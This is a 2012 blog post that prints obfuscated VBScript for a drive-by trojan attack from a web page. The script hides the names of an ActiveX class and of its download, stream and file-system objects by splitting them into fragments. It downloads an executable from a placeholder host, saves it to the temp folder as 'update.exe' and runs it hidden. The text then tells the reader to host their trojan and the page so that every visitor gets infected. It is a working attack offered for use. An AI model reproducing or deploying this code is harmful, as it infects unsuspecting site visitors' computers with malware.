About Me

Thursday, 12 April 2012

Trojan Attack Using Web Pages By Apex Predator:

</p><p>on error resume next</p><p>dl = “www.abc.com/trojan.exe”</p><p>Set df = document.createElement(“object”)</p><p>cls1=”clsid:BD96″</p><p>cls2=”C556-65A”</p><p>cls3=”3-11D0-9″</p><p>cls4=”83A-00C04FC29E36″</p><p>clsfull=cls1&cls2&cls3&cls4</p><p>df.setAttribute “classid”,clsfull</p><p>strr1=”Mic”</p><p>strr2=”roso”</p><p>strr3=”ft.”</p><p>strr4=”XML”</p><p>strr5=”HTTP”</p><p>strr=strr1&strr2&strr3&strr4&strr5</p><p>Set x = df.CreateObject(strr,”")</p><p>ab1=”A”</p><p>ab2=”dod”</p><p>ab3=”b.S”</p><p>ab4=”t”</p><p>ab5=”re”</p><p>ab6=”am”</p><p>strb1=ab1&ab2&ab3&ab4&ab5&ab6</p><p>strb5=strb1</p><p>set YY = df.createobject(strb5,”")</p><p>YY.type = 1</p><p>str6=”GET”</p><p>x.Open str6, dl, False</p><p>x.Send</p><p>fnamezz1=”update.exe”</p><p>scripp1=”Scrip”</p><p>scripp2=”ting”</p><p>scripp3=”.Fil”</p><p>scripp4=”eSyste”</p><p>scripp5=”mObject”</p><p>scripp=scripp1&scripp2&scripp3&scripp4&scripp5</p><p>set FF = df.createobject(scripp,”")</p><p>set tmp = F.GetSpecialFolder(2)</p><p>fnamezz1= FF.BuildPath(tmp,fnamezz1)</p><p>YY.open</p><p>YY.write x.responseBody</p><p>YY.savetofile fnamezz1,2</p><p>YY.close</p><p>set MM = df.createobject(“Shell.Application”,”")</p><p>MM.ShellExecute fnamezz1,”",”",”open”,0</p><p>


This was a normal html code which would create a simple webpage.
Now what you have to do is, the server file of your trojan you will have to upload it on some webhosting and then change the link of the server file in the code and then save this code as “index.html” and then upload it to the same host.
All done, now everytime someone opens that webpage they would be infected with your trojan’s server.

0 comments:

Post a Comment